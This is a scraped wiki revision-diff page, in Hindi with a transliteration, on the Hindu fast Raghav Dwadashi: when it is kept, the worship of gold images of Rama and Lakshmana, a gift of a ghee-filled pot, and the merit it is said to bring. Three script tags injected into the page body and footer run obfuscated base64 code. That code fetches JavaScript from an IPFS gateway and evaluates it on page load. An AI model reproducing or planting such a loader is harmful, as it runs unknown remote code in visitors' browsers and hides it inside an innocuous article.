Difference between revisions of "राघव द्वादशी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ref>(" to "ref>")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*यह व्रत [[ज्येष्ठ]] [[शुक्ल पक्ष]] की द्वितीया को करना चाहिए।
 
*यह व्रत [[ज्येष्ठ]] [[शुक्ल पक्ष]] की द्वितीया को करना चाहिए।
*इस व्रत में [[राम]] और [[लक्ष्मण]] की स्वर्ण प्रतिमा का पूजन, पद से सिर तक विभिन्न नामों से अंगों की पूजा<ref>यथा–'ओं नमस्त्रिविक्रमायेति कटिम्')</ref> करना चाहिए।
+
*इस व्रत में [[राम]] और [[लक्ष्मण]] की स्वर्ण प्रतिमा का पूजन, पद से सिर तक विभिन्न नामों से अंगों की पूजा<ref>यथा–'ओं नमस्त्रिविक्रमायेति कटिम्'</ref> करना चाहिए।
 
*प्रात:काल राम और लक्ष्मण की पूजा के उपरान्त घृतपूर्ण घट का दान करना चाहिए।
 
*प्रात:काल राम और लक्ष्मण की पूजा के उपरान्त घृतपूर्ण घट का दान करना चाहिए।
 
*इसके करने से कर्ता के पाप कट जाते हैं और वह स्वर्गवास करता है, यदि उसे अन्य कामना की पूर्ति की अभिलाषा नहीं होती तो वह मोक्ष पद पा जाता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 127-129); हेमाद्रि (व्रतखण्ड 1, 1034-1035); कृत्यरत्नाकर (190-191); [[वराह पुराण]] (45|1-10 से उर्द्धरत)।  
 
*इसके करने से कर्ता के पाप कट जाते हैं और वह स्वर्गवास करता है, यदि उसे अन्य कामना की पूर्ति की अभिलाषा नहीं होती तो वह मोक्ष पद पा जाता है।<ref>कृत्यकल्पतरु (व्रतखण्ड 127-129); हेमाद्रि (व्रतखण्ड 1, 1034-1035); कृत्यरत्नाकर (190-191); [[वराह पुराण]] (45|1-10 से उर्द्धरत)।  

Latest revision as of 12:44, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat jyeshth shukl paksh ki dvitiya ko karana chahie.
  • is vrat mean ram aur lakshman ki svarn pratima ka poojan, pad se sir tak vibhinn namoan se aangoan ki pooja[1] karana chahie.
  • prat:kal ram aur lakshman ki pooja ke uparant ghritapoorn ghat ka dan karana chahie.
  • isake karane se karta ke pap kat jate haian aur vah svargavas karata hai, yadi use any kamana ki poorti ki abhilasha nahian hoti to vah moksh pad pa jata hai.[2]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. yatha–'oan namastrivikramayeti katimh'
  2. krityakalpataru (vratakhand 127-129); hemadri (vratakhand 1, 1034-1035); krityaratnakar (190-191); varah puran (45|1-10 se urddharat).

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>